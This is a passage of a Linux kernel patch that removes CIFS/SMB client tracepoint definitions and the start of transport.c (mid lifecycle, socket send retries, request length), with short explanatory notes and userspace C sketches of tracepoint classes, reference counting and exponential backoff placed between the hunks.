+-	TP_STRUCT__entry(
+-		__field(unsigned long, ino)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->ino = ino;
+-		__entry->rc = rc;
+-	),
+-	TP_printk("\tino=%lu rc=%d",
+-		__entry->ino, __entry->rc)
+-)
+-
+-#define DEFINE_SMB3_SYNC_ERR_EVENT(name)          \
+-DEFINE_EVENT(smb3_sync_err_class, cifs_##name,    \
+-	TP_PROTO(unsigned long ino,		\
+-		int	rc),			\
+-	TP_ARGS(ino, rc))
+-
+-DEFINE_SMB3_SYNC_ERR_EVENT(fsync_err);
+-DEFINE_SMB3_SYNC_ERR_EVENT(flush_err);
+-
+-
+-DECLARE_EVENT_CLASS(smb3_enter_exit_class,
+-	TP_PROTO(unsigned int xid,
+-		const char *func_name),
+-	TP_ARGS(xid, func_name),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__string(func_name, func_name)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__assign_str(func_name, func_name);
+-	),
+-	TP_printk("\t%s: xid=%u",
+-		__get_str(func_name), __entry->xid)
+-)
+-
+-#define DEFINE_SMB3_ENTER_EXIT_EVENT(name)        \
+-DEFINE_EVENT(smb3_enter_exit_class, smb3_##name,  \
+-	TP_PROTO(unsigned int xid,		\
+-		const char *func_name),		\
+-	TP_ARGS(xid, func_name))
+-
+-DEFINE_SMB3_ENTER_EXIT_EVENT(enter);
+-DEFINE_SMB3_ENTER_EXIT_EVENT(exit_done);
+-
+-/*
+- * For SMB2/SMB3 tree connect
+- */
+-
+-DECLARE_EVENT_CLASS(smb3_tcon_class,
+-	TP_PROTO(unsigned int xid,
+-		__u32	tid,
+-		__u64	sesid,
+-		const char *unc_name,
+-		int	rc),
+-	TP_ARGS(xid, tid, sesid, unc_name, rc),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__string(name, unc_name)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__assign_str(name, unc_name);
+-		__entry->rc = rc;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x unc_name=%s rc=%d",
+-		__entry->xid, __entry->sesid, __entry->tid,
+-		__get_str(name), __entry->rc)
+-)
+-
+-#define DEFINE_SMB3_TCON_EVENT(name)          \
+-DEFINE_EVENT(smb3_tcon_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		const char *unc_name,		\
+-		int	rc),			\
+-	TP_ARGS(xid, tid, sesid, unc_name, rc))
+-
+-DEFINE_SMB3_TCON_EVENT(tcon);
+-
+-
+-/*
+- * For smb2/smb3 open (including create and mkdir) calls
+- */
+-
+-DECLARE_EVENT_CLASS(smb3_open_enter_class,
+-	TP_PROTO(unsigned int xid,
+-		__u32	tid,
+-		__u64	sesid,
+-		const char *full_path,
+-		int	create_options,
+-		int	desired_access),
+-	TP_ARGS(xid, tid, sesid, full_path, create_options, desired_access),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__string(path, full_path)
+-		__field(int, create_options)
+-		__field(int, desired_access)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__assign_str(path, full_path);
+-		__entry->create_options = create_options;
+-		__entry->desired_access = desired_access;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x path=%s cr_opts=0x%x des_access=0x%x",
+-		__entry->xid, __entry->sesid, __entry->tid, __get_str(path),
+-		__entry->create_options, __entry->desired_access)
+-)
+-
+-#define DEFINE_SMB3_OPEN_ENTER_EVENT(name)        \
+-DEFINE_EVENT(smb3_open_enter_class, smb3_##name,  \
+-	TP_PROTO(unsigned int xid,		\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		const char *full_path,		\
+-		int	create_options,		\
+-		int	desired_access),	\
+-	TP_ARGS(xid, tid, sesid, full_path, create_options, desired_access))
+-
+-DEFINE_SMB3_OPEN_ENTER_EVENT(open_enter);
+-DEFINE_SMB3_OPEN_ENTER_EVENT(posix_mkdir_enter);
+-
+-DECLARE_EVENT_CLASS(smb3_open_err_class,
+-	TP_PROTO(unsigned int xid,
+-		__u32	tid,
+-		__u64	sesid,
+-		int	create_options,
+-		int	desired_access,
+-		int	rc),
+-	TP_ARGS(xid, tid, sesid, create_options, desired_access, rc),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(int,   create_options)
+-		__field(int, desired_access)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->create_options = create_options;
+-		__entry->desired_access = desired_access;
+-		__entry->rc = rc;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x cr_opts=0x%x des_access=0x%x rc=%d",
+-		__entry->xid, __entry->sesid, __entry->tid,
+-		__entry->create_options, __entry->desired_access, __entry->rc)
+-)
+-
+-#define DEFINE_SMB3_OPEN_ERR_EVENT(name)          \
+-DEFINE_EVENT(smb3_open_err_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		int	create_options,		\
+-		int	desired_access,		\
+-		int	rc),			\
+-	TP_ARGS(xid, tid, sesid, create_options, desired_access, rc))
+-
+-DEFINE_SMB3_OPEN_ERR_EVENT(open_err);
+-DEFINE_SMB3_OPEN_ERR_EVENT(posix_mkdir_err);
+-
+-DECLARE_EVENT_CLASS(smb3_open_done_class,
+-	TP_PROTO(unsigned int xid,
+-		__u64	fid,
+-		__u32	tid,
+-		__u64	sesid,
+-		int	create_options,
+-		int	desired_access),
+-	TP_ARGS(xid, fid, tid, sesid, create_options, desired_access),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u64, fid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(int, create_options)
+-		__field(int, desired_access)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->fid = fid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->create_options = create_options;
+-		__entry->desired_access = desired_access;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx cr_opts=0x%x des_access=0x%x",
+-		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
+-		__entry->create_options, __entry->desired_access)
+-)
+-
+-#define DEFINE_SMB3_OPEN_DONE_EVENT(name)        \
+-DEFINE_EVENT(smb3_open_done_class, smb3_##name,  \
+-	TP_PROTO(unsigned int xid,		\
+-		__u64	fid,			\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		int	create_options,		\
+-		int	desired_access),	\
+-	TP_ARGS(xid, fid, tid, sesid, create_options, desired_access))
+-
+-DEFINE_SMB3_OPEN_DONE_EVENT(open_done);
+-DEFINE_SMB3_OPEN_DONE_EVENT(posix_mkdir_done);
+-
+-
+-DECLARE_EVENT_CLASS(smb3_lease_done_class,
+-	TP_PROTO(__u32	lease_state,
+-		__u32	tid,
+-		__u64	sesid,
+-		__u64	lease_key_low,
+-		__u64	lease_key_high),
+-	TP_ARGS(lease_state, tid, sesid, lease_key_low, lease_key_high),
+-	TP_STRUCT__entry(
+-		__field(__u32, lease_state)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(__u64, lease_key_low)
+-		__field(__u64, lease_key_high)
+-	),
+-	TP_fast_assign(
+-		__entry->lease_state = lease_state;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->lease_key_low = lease_key_low;
+-		__entry->lease_key_high = lease_key_high;
+-	),
+-	TP_printk("sid=0x%llx tid=0x%x lease_key=0x%llx%llx lease_state=0x%x",
+-		__entry->sesid, __entry->tid, __entry->lease_key_high,
+-		__entry->lease_key_low, __entry->lease_state)
+-)
+-
+-#define DEFINE_SMB3_LEASE_DONE_EVENT(name)        \
+-DEFINE_EVENT(smb3_lease_done_class, smb3_##name,  \
+-	TP_PROTO(__u32	lease_state,		\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		__u64	lease_key_low,		\
+-		__u64	lease_key_high),	\
+-	TP_ARGS(lease_state, tid, sesid, lease_key_low, lease_key_high))
+-
+-DEFINE_SMB3_LEASE_DONE_EVENT(lease_done);
+-DEFINE_SMB3_LEASE_DONE_EVENT(lease_not_found);
+-
+-DECLARE_EVENT_CLASS(smb3_lease_err_class,
+-	TP_PROTO(__u32	lease_state,
+-		__u32	tid,
+-		__u64	sesid,
+-		__u64	lease_key_low,
+-		__u64	lease_key_high,
+-		int	rc),
+-	TP_ARGS(lease_state, tid, sesid, lease_key_low, lease_key_high, rc),
+-	TP_STRUCT__entry(
+-		__field(__u32, lease_state)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(__u64, lease_key_low)
+-		__field(__u64, lease_key_high)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->lease_state = lease_state;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->lease_key_low = lease_key_low;
+-		__entry->lease_key_high = lease_key_high;
+-		__entry->rc = rc;
+-	),
+-	TP_printk("sid=0x%llx tid=0x%x lease_key=0x%llx%llx lease_state=0x%x rc=%d",
+-		__entry->sesid, __entry->tid, __entry->lease_key_high,
+-		__entry->lease_key_low, __entry->lease_state, __entry->rc)
+-)
+-
+-#define DEFINE_SMB3_LEASE_ERR_EVENT(name)        \
+-DEFINE_EVENT(smb3_lease_err_class, smb3_##name,  \
+-	TP_PROTO(__u32	lease_state,		\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		__u64	lease_key_low,		\
+-		__u64	lease_key_high,		\
+-		int	rc),			\
+-	TP_ARGS(lease_state, tid, sesid, lease_key_low, lease_key_high, rc))
+-
+-DEFINE_SMB3_LEASE_ERR_EVENT(lease_err);
+-
+-DECLARE_EVENT_CLASS(smb3_connect_class,
+-	TP_PROTO(char *hostname,
+-		__u64 conn_id,
+-		const struct __kernel_sockaddr_storage *dst_addr),
+-	TP_ARGS(hostname, conn_id, dst_addr),
+-	TP_STRUCT__entry(
+-		__string(hostname, hostname)
+-		__field(__u64, conn_id)
+-		__array(__u8, dst_addr, sizeof(struct sockaddr_storage))
+-	),
+-	TP_fast_assign(
+-		struct sockaddr_storage *pss = NULL;
+-
+-		__entry->conn_id = conn_id;
+-		pss = (struct sockaddr_storage *)__entry->dst_addr;
+-		*pss = *dst_addr;
+-		__assign_str(hostname, hostname);
+-	),
+-	TP_printk("conn_id=0x%llx server=%s addr=%pISpsfc",
+-		__entry->conn_id,
+-		__get_str(hostname),
+-		__entry->dst_addr)
+-)
+-
+-#define DEFINE_SMB3_CONNECT_EVENT(name)        \
+-DEFINE_EVENT(smb3_connect_class, smb3_##name,  \
+-	TP_PROTO(char *hostname,		\
+-		__u64 conn_id,			\
+-		const struct __kernel_sockaddr_storage *addr),	\
+-	TP_ARGS(hostname, conn_id, addr))
+-
+-DEFINE_SMB3_CONNECT_EVENT(connect_done);
+-
+-DECLARE_EVENT_CLASS(smb3_connect_err_class,
+-	TP_PROTO(char *hostname, __u64 conn_id,
+-		const struct __kernel_sockaddr_storage *dst_addr, int rc),
+-	TP_ARGS(hostname, conn_id, dst_addr, rc),
+-	TP_STRUCT__entry(
+-		__string(hostname, hostname)
+-		__field(__u64, conn_id)
+-		__array(__u8, dst_addr, sizeof(struct sockaddr_storage))
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		struct sockaddr_storage *pss = NULL;
+-
+-		__entry->conn_id = conn_id;
+-		__entry->rc = rc;
+-		pss = (struct sockaddr_storage *)__entry->dst_addr;
+-		*pss = *dst_addr;
+-		__assign_str(hostname, hostname);
+-	),
+-	TP_printk("rc=%d conn_id=0x%llx server=%s addr=%pISpsfc",
+-		__entry->rc,
+-		__entry->conn_id,
+-		__get_str(hostname),
+-		__entry->dst_addr)
+-)
+-
+-#define DEFINE_SMB3_CONNECT_ERR_EVENT(name)        \
+-DEFINE_EVENT(smb3_connect_err_class, smb3_##name,  \
+-	TP_PROTO(char *hostname,		\
+-		__u64 conn_id,			\
+-		const struct __kernel_sockaddr_storage *addr,	\
+-		int rc),			\
+-	TP_ARGS(hostname, conn_id, addr, rc))
+-
+-DEFINE_SMB3_CONNECT_ERR_EVENT(connect_err);
+-
+-DECLARE_EVENT_CLASS(smb3_reconnect_class,
+-	TP_PROTO(__u64	currmid,
+-		__u64 conn_id,
+-		char *hostname),
+-	TP_ARGS(currmid, conn_id, hostname),
+-	TP_STRUCT__entry(
+-		__field(__u64, currmid)
+-		__field(__u64, conn_id)
+-		__string(hostname, hostname)
+-	),
+-	TP_fast_assign(
+-		__entry->currmid = currmid;
+-		__entry->conn_id = conn_id;
+-		__assign_str(hostname, hostname);
+-	),
+-	TP_printk("conn_id=0x%llx server=%s current_mid=%llu",
+-		__entry->conn_id,
+-		__get_str(hostname),
+-		__entry->currmid)
+-)
+-
+-#define DEFINE_SMB3_RECONNECT_EVENT(name)        \
+-DEFINE_EVENT(smb3_reconnect_class, smb3_##name,  \
+-	TP_PROTO(__u64	currmid,		\
+-		__u64 conn_id,			\
+-		char *hostname),				\
+-	TP_ARGS(currmid, conn_id, hostname))
+-
+-DEFINE_SMB3_RECONNECT_EVENT(reconnect);
+-DEFINE_SMB3_RECONNECT_EVENT(partial_send_reconnect);
+-
+-DECLARE_EVENT_CLASS(smb3_credit_class,
+-	TP_PROTO(__u64	currmid,
+-		__u64 conn_id,
+-		char *hostname,
+-		int credits,
+-		int credits_to_add,
+-		int in_flight),
+-	TP_ARGS(currmid, conn_id, hostname, credits, credits_to_add, in_flight),
+-	TP_STRUCT__entry(
+-		__field(__u64, currmid)
+-		__field(__u64, conn_id)
+-		__string(hostname, hostname)
+-		__field(int, credits)
+-		__field(int, credits_to_add)
+-		__field(int, in_flight)
+-	),
+-	TP_fast_assign(
+-		__entry->currmid = currmid;
+-		__entry->conn_id = conn_id;
+-		__assign_str(hostname, hostname);
+-		__entry->credits = credits;
+-		__entry->credits_to_add = credits_to_add;
+-		__entry->in_flight = in_flight;
+-	),
+-	TP_printk("conn_id=0x%llx server=%s current_mid=%llu "
+-			"credits=%d credit_change=%d in_flight=%d",
+-		__entry->conn_id,
+-		__get_str(hostname),
+-		__entry->currmid,
+-		__entry->credits,
+-		__entry->credits_to_add,
+-		__entry->in_flight)
+-)
+-
+-#define DEFINE_SMB3_CREDIT_EVENT(name)        \
+-DEFINE_EVENT(smb3_credit_class, smb3_##name,  \
+-	TP_PROTO(__u64	currmid,		\
+-		__u64 conn_id,			\
+-		char *hostname,			\
+-		int  credits,			\
+-		int  credits_to_add,	\
+-		int in_flight),			\
+-	TP_ARGS(currmid, conn_id, hostname, credits, credits_to_add, in_flight))
+-
+-DEFINE_SMB3_CREDIT_EVENT(reconnect_with_invalid_credits);
+-DEFINE_SMB3_CREDIT_EVENT(reconnect_detected);
+-DEFINE_SMB3_CREDIT_EVENT(credit_timeout);
+-DEFINE_SMB3_CREDIT_EVENT(insufficient_credits);
+-DEFINE_SMB3_CREDIT_EVENT(too_many_credits);
+-DEFINE_SMB3_CREDIT_EVENT(add_credits);
+-DEFINE_SMB3_CREDIT_EVENT(adj_credits);
+-DEFINE_SMB3_CREDIT_EVENT(hdr_credits);
+-DEFINE_SMB3_CREDIT_EVENT(nblk_credits);
+-DEFINE_SMB3_CREDIT_EVENT(pend_credits);
+-DEFINE_SMB3_CREDIT_EVENT(wait_credits);
+-DEFINE_SMB3_CREDIT_EVENT(waitff_credits);
+-DEFINE_SMB3_CREDIT_EVENT(overflow_credits);
+-DEFINE_SMB3_CREDIT_EVENT(set_credits);
+-
+-#endif /* _CIFS_TRACE_H */
+-
+-#undef TRACE_INCLUDE_PATH
+-#define TRACE_INCLUDE_PATH .
+-#define TRACE_INCLUDE_FILE trace
+-#include <trace/define_trace.h>
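The trace.h hunk above removes tracepoints that are all built from one
pattern: DECLARE_EVENT_CLASS fixes the argument list, record layout and
printk format once, and each DEFINE_EVENT stamps out a named
trace_smb3_* event that reuses that class. A rough illustration of the
same class/instance idea in plain C follows; the kernel macros generate
real tracepoints, and every name here (log_credit_class,
DEFINE_CREDIT_EVENT) is hypothetical.

#include <stdio.h>

/* shared "class" body: one format string for every event that uses it,
 * playing the role of TP_STRUCT__entry/TP_printk in the hunk above */
static void log_credit_class(const char *event, unsigned long long conn_id,
			     const char *hostname, int credits)
{
	printf("%s: conn_id=0x%llx server=%s credits=%d\n",
	       event, conn_id, hostname, credits);
}

/* each use creates a named wrapper, like DEFINE_SMB3_CREDIT_EVENT() */
#define DEFINE_CREDIT_EVENT(name)					\
static void trace_smb3_##name(unsigned long long conn_id,		\
			      const char *hostname, int credits)	\
{									\
	log_credit_class(#name, conn_id, hostname, credits);		\
}

DEFINE_CREDIT_EVENT(add_credits)
DEFINE_CREDIT_EVENT(wait_credits)

int main(void)
{
	trace_smb3_add_credits(0x1234, "server1", 10);
	trace_smb3_wait_credits(0x1234, "server1", 2);
	return 0;
}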
+diff --git a/fs/cifs/transport.c b/fs/cifs/transport.c
+deleted file mode 100644
+index c961b90f92b9f..0000000000000
+--- a/fs/cifs/transport.c
++++ /dev/null
+@@ -1,1807 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *   Jeremy Allison (jra@samba.org) 2006.
+- *
+- */
+-
+-#include <linux/fs.h>
+-#include <linux/list.h>
+-#include <linux/gfp.h>
+-#include <linux/wait.h>
+-#include <linux/net.h>
+-#include <linux/delay.h>
+-#include <linux/freezer.h>
+-#include <linux/tcp.h>
+-#include <linux/bvec.h>
+-#include <linux/highmem.h>
+-#include <linux/uaccess.h>
+-#include <asm/processor.h>
+-#include <linux/mempool.h>
+-#include <linux/sched/signal.h>
+-#include <linux/task_io_accounting_ops.h>
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "smb2proto.h"
+-#include "smbdirect.h"
+-
+-/* Max number of iovectors we can use off the stack when sending requests. */
+-#define CIFS_MAX_IOV_SIZE 8
+-
+-void
+-cifs_wake_up_task(struct mid_q_entry *mid)
+-{
+-	wake_up_process(mid->callback_data);
+-}
+-
+-static struct mid_q_entry *
+-alloc_mid(const struct smb_hdr *smb_buffer, struct TCP_Server_Info *server)
+-{
+-	struct mid_q_entry *temp;
+-
+-	if (server == NULL) {
+-		cifs_dbg(VFS, "%s: null TCP session\n", __func__);
+-		return NULL;
+-	}
+-
+-	temp = mempool_alloc(cifs_mid_poolp, GFP_NOFS);
+-	memset(temp, 0, sizeof(struct mid_q_entry));
+-	kref_init(&temp->refcount);
+-	temp->mid = get_mid(smb_buffer);
+-	temp->pid = current->pid;
+-	temp->command = cpu_to_le16(smb_buffer->Command);
+-	cifs_dbg(FYI, "For smb_command %d\n", smb_buffer->Command);
+-	/*	do_gettimeofday(&temp->when_sent);*/ /* easier to use jiffies */
+-	/* when mid allocated can be before when sent */
+-	temp->when_alloc = jiffies;
+-	temp->server = server;
+-
+-	/*
+-	 * The default is for the mid to be synchronous, so the
+-	 * default callback just wakes up the current task.
+-	 */
+-	get_task_struct(current);
+-	temp->creator = current;
+-	temp->callback = cifs_wake_up_task;
+-	temp->callback_data = current;
+-
+-	atomic_inc(&mid_count);
+-	temp->mid_state = MID_REQUEST_ALLOCATED;
+-	return temp;
+-}
+-
+-static void __release_mid(struct kref *refcount)
+-{
+-	struct mid_q_entry *midEntry =
+-			container_of(refcount, struct mid_q_entry, refcount);
+-#ifdef CONFIG_CIFS_STATS2
+-	__le16 command = midEntry->server->vals->lock_cmd;
+-	__u16 smb_cmd = le16_to_cpu(midEntry->command);
+-	unsigned long now;
+-	unsigned long roundtrip_time;
+-#endif
+-	struct TCP_Server_Info *server = midEntry->server;
+-
+-	if (midEntry->resp_buf && (midEntry->mid_flags & MID_WAIT_CANCELLED) &&
+-	    midEntry->mid_state == MID_RESPONSE_RECEIVED &&
+-	    server->ops->handle_cancelled_mid)
+-		server->ops->handle_cancelled_mid(midEntry, server);
+-
+-	midEntry->mid_state = MID_FREE;
+-	atomic_dec(&mid_count);
+-	if (midEntry->large_buf)
+-		cifs_buf_release(midEntry->resp_buf);
+-	else
+-		cifs_small_buf_release(midEntry->resp_buf);
+-#ifdef CONFIG_CIFS_STATS2
+-	now = jiffies;
+-	if (now < midEntry->when_alloc)
+-		cifs_server_dbg(VFS, "Invalid mid allocation time\n");
+-	roundtrip_time = now - midEntry->when_alloc;
+-
+-	if (smb_cmd < NUMBER_OF_SMB2_COMMANDS) {
+-		if (atomic_read(&server->num_cmds[smb_cmd]) == 0) {
+-			server->slowest_cmd[smb_cmd] = roundtrip_time;
+-			server->fastest_cmd[smb_cmd] = roundtrip_time;
+-		} else {
+-			if (server->slowest_cmd[smb_cmd] < roundtrip_time)
+-				server->slowest_cmd[smb_cmd] = roundtrip_time;
+-			else if (server->fastest_cmd[smb_cmd] > roundtrip_time)
+-				server->fastest_cmd[smb_cmd] = roundtrip_time;
+-		}
+-		cifs_stats_inc(&server->num_cmds[smb_cmd]);
+-		server->time_per_cmd[smb_cmd] += roundtrip_time;
+-	}
+-	/*
+-	 * Commands taking longer than one second (the default) can indicate
+-	 * that something is wrong, unless it is quite a slow link or a very
+-	 * busy server. Note that this calculation is unlikely or impossible
+-	 * to wrap as long as slow_rsp_threshold is not set far above the
+-	 * recommended maximum value (32767, i.e. 9 hours), and is generally
+-	 * harmless even if wrong since it only affects debug counters - so
+-	 * we leave the calculation as a simple comparison rather than doing
+-	 * multiple conversions and overflow checks.
+-	 */
+-	if ((slow_rsp_threshold != 0) &&
+-	    time_after(now, midEntry->when_alloc + (slow_rsp_threshold * HZ)) &&
+-	    (midEntry->command != command)) {
+-		/*
+-		 * smb2slowcmd[NUMBER_OF_SMB2_COMMANDS] counts by command
+-		 * NB: le16_to_cpu returns unsigned so it cannot be negative below
+-		 */
+-		if (smb_cmd < NUMBER_OF_SMB2_COMMANDS)
+-			cifs_stats_inc(&server->smb2slowcmd[smb_cmd]);
+-
+-		trace_smb3_slow_rsp(smb_cmd, midEntry->mid, midEntry->pid,
+-			       midEntry->when_sent, midEntry->when_received);
+-		if (cifsFYI & CIFS_TIMER) {
+-			pr_debug("slow rsp: cmd %d mid %llu",
+-				 midEntry->command, midEntry->mid);
+-			cifs_info("A: 0x%lx S: 0x%lx R: 0x%lx\n",
+-				  now - midEntry->when_alloc,
+-				  now - midEntry->when_sent,
+-				  now - midEntry->when_received);
+-		}
+-	}
+-#endif
+-	put_task_struct(midEntry->creator);
+-
+-	mempool_free(midEntry, cifs_mid_poolp);
+-}
+-
+-void release_mid(struct mid_q_entry *mid)
+-{
+-	struct TCP_Server_Info *server = mid->server;
+-
+-	spin_lock(&server->mid_lock);
+-	kref_put(&mid->refcount, __release_mid);
+-	spin_unlock(&server->mid_lock);
+-}
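The mid lifecycle removed above is reference counted: alloc_mid() does
kref_init() (count = 1), release_mid() does kref_put() under the
server's mid_lock, and __release_mid() runs only when the last
reference drops. A minimal userspace sketch of that idiom, using C11
atomics in place of <linux/kref.h>; the types and helpers below are
hypothetical stand-ins, not the kernel API.

#include <stdatomic.h>
#include <stdio.h>
#include <stdlib.h>

struct mid_entry {
	atomic_int refcount;
	unsigned long long mid;
};

static struct mid_entry *mid_alloc(unsigned long long mid)
{
	struct mid_entry *m = calloc(1, sizeof(*m));

	if (!m)
		return NULL;
	atomic_init(&m->refcount, 1);	/* kref_init() equivalent */
	m->mid = mid;
	return m;
}

static void mid_put(struct mid_entry *m)
{
	/* kref_put() equivalent: free only when the last reference drops */
	if (atomic_fetch_sub(&m->refcount, 1) == 1) {
		printf("freeing mid %llu\n", m->mid);
		free(m);
	}
}

int main(void)
{
	struct mid_entry *m = mid_alloc(42);

	atomic_fetch_add(&m->refcount, 1);	/* kref_get() equivalent */
	mid_put(m);				/* one reference still held */
	mid_put(m);				/* last reference: released */
	return 0;
}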
+-
+-void
+-delete_mid(struct mid_q_entry *mid)
+-{
+-	spin_lock(&mid->server->mid_lock);
+-	if (!(mid->mid_flags & MID_DELETED)) {
+-		list_del_init(&mid->qhead);
+-		mid->mid_flags |= MID_DELETED;
+-	}
+-	spin_unlock(&mid->server->mid_lock);
+-
+-	release_mid(mid);
+-}
+-
+-/*
+- * smb_send_kvec - send an array of kvecs to the server
+- * @server:	Server to send the data to
+- * @smb_msg:	Message to send
+- * @sent:	amount of data sent on socket is stored here
+- *
+- * Our basic "send data to server" function. Should be called with srv_mutex
+- * held. The caller is responsible for handling the results.
+- */
+-static int
+-smb_send_kvec(struct TCP_Server_Info *server, struct msghdr *smb_msg,
+-	      size_t *sent)
+-{
+-	int rc = 0;
+-	int retries = 0;
+-	struct socket *ssocket = server->ssocket;
+-
+-	*sent = 0;
+-
+-	if (server->noblocksnd)
+-		smb_msg->msg_flags = MSG_DONTWAIT + MSG_NOSIGNAL;
+-	else
+-		smb_msg->msg_flags = MSG_NOSIGNAL;
+-
+-	while (msg_data_left(smb_msg)) {
+-		/*
+-		 * For a blocking send we try 3 times, since each try can
+-		 * block for 5 seconds. For a nonblocking send we have to
+-		 * try more times, but wait increasing amounts of time to
+-		 * allow the socket to clear.  The overall time we wait in
+-		 * either case to send on the socket is about 15 seconds.
+-		 * Similarly, in SendReceive[2] we wait 15 seconds for the
+-		 * server to send a response back for most types of
+-		 * requests (except SMB Writes past end of file, which can
+-		 * be slow, and blocking lock operations). NFS waits
+-		 * slightly longer than CIFS, but this can make it take
+-		 * longer for nonresponsive servers to be detected, and
+-		 * 15 seconds is more than enough time for modern
+-		 * networks to send a packet.  In most cases if we fail
+-		 * to send after the retries we will kill the socket
+-		 * and reconnect, which may clear the network
+-		 * problem.
+-		 */
+-		rc = sock_sendmsg(ssocket, smb_msg);
+-		if (rc == -EAGAIN) {
+-			retries++;
+-			if (retries >= 14 ||
+-			    (!server->noblocksnd && (retries > 2))) {
+-				cifs_server_dbg(VFS, "sends on sock %p stuck for 15 seconds\n",
+-					 ssocket);
+-				return -EAGAIN;
+-			}
+-			msleep(1 << retries);
+-			continue;
+-		}
+-
+-		if (rc < 0)
+-			return rc;
+-
+-		if (rc == 0) {
+-			/* should never happen, letting socket clear before
+-			   retrying is our only obvious option here */
+-			cifs_server_dbg(VFS, "tcp sent no data\n");
+-			msleep(500);
+-			continue;
+-		}
+-
+-		/* send was at least partially successful */
+-		*sent += rc;
+-		retries = 0; /* in case we get ENOSPC on the next send */
+-	}
+-	return 0;
+-}
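The loop in smb_send_kvec() above retries -EAGAIN with exponential
backoff: msleep(1 << retries) doubles the sleep each time, and the
sender gives up after 14 retries on a nonblocking socket (3 on a
blocking one), which bounds the total wait to roughly 15 seconds. A
standalone sketch of the same policy; send_once() is a hypothetical
stand-in for sock_sendmsg().

#include <errno.h>
#include <stdio.h>
#include <unistd.h>

/* pretend the socket is congested for the first few attempts */
static int send_once(int attempt)
{
	return attempt < 4 ? -EAGAIN : 0;
}

static int send_with_backoff(int nonblocking)
{
	int retries = 0, attempt = 0, rc;

	for (;;) {
		rc = send_once(attempt++);
		if (rc != -EAGAIN)
			return rc;
		retries++;
		if (retries >= 14 || (!nonblocking && retries > 2))
			return -EAGAIN;		/* ~15s spent: give up */
		usleep((1u << retries) * 1000);	/* msleep(1 << retries) */
	}
}

int main(void)
{
	printf("rc=%d\n", send_with_backoff(1));
	return 0;
}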
+-
+-unsigned long
+-smb_rqst_len(struct TCP_Server_Info *server, struct smb_rqst *rqst)
+-{
+-	unsigned int i;
+-	struct kvec *iov;
+-	int nvec;
+-	unsigned long buflen = 0;
+-
+-	if (!is_smb1(server) && rqst->rq_nvec >= 2 &&
+-	    rqst->rq_iov[0].iov_len == 4) {
+-		iov = &rqst->rq_iov[1];
+-		nvec = rqst->rq_nvec - 1;
+-	} else {
+-		iov = rqst->rq_iov;
+-		nvec = rqst->rq_nvec;
+-	}
+-
+-	/* total up iov array first */
+-	for (i = 0; i < nvec; i++)
+-		buflen += iov[i].iov_len;
+-
+-	/*
+-	 * Add in the page array if there is one. The caller needs to make
+-	 * sure rq_offset and rq_tailsz are set correctly. If a buffer of
+-	 * multiple pages ends at page boundary, rq_tailsz needs to be set to
+-	 * PAGE_SIZE.
+-	 */
+-	if (rqst->rq_npages) {
+-		if (rqst->rq_npages == 1)
+-			buflen += rqst->rq_tailsz;
+-		else {
+-			/*
+-			 * If there is more than one page, calculate the
+-			 * buffer length based on rq_offset and rq_tailsz
+-			 */
+-			buflen += rqst->rq_pagesz * (rqst->rq_npages - 1) -
+-					rqst->rq_offset;
+-			buflen += rqst->rq_tailsz;
+-		}
+-	}
+-
+-	return buflen;
+-}
+-
+-static int
+-__smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+-		struct smb_rqst *rqst)
+-{
+-	int rc;
+-	struct kvec *iov;
+-	int n_vec;
+-	unsigned int send_length = 0;
+-	unsigned int i, j;
+-	sigset_t mask, oldmask;
+-	size_t total_len = 0, sent, size;
+-	struct socket *ssocket = server->ssocket;
+-	struct msghdr smb_msg = {};
+-	__be32 rfc1002_marker;
+-
+-	cifs_in_send_inc(server);
+-	if (cifs_rdma_enabled(server)) {
+-		/* return -EAGAIN when connecting or reconnecting */
+-		rc = -EAGAIN;
+-		if (server->smbd_conn)
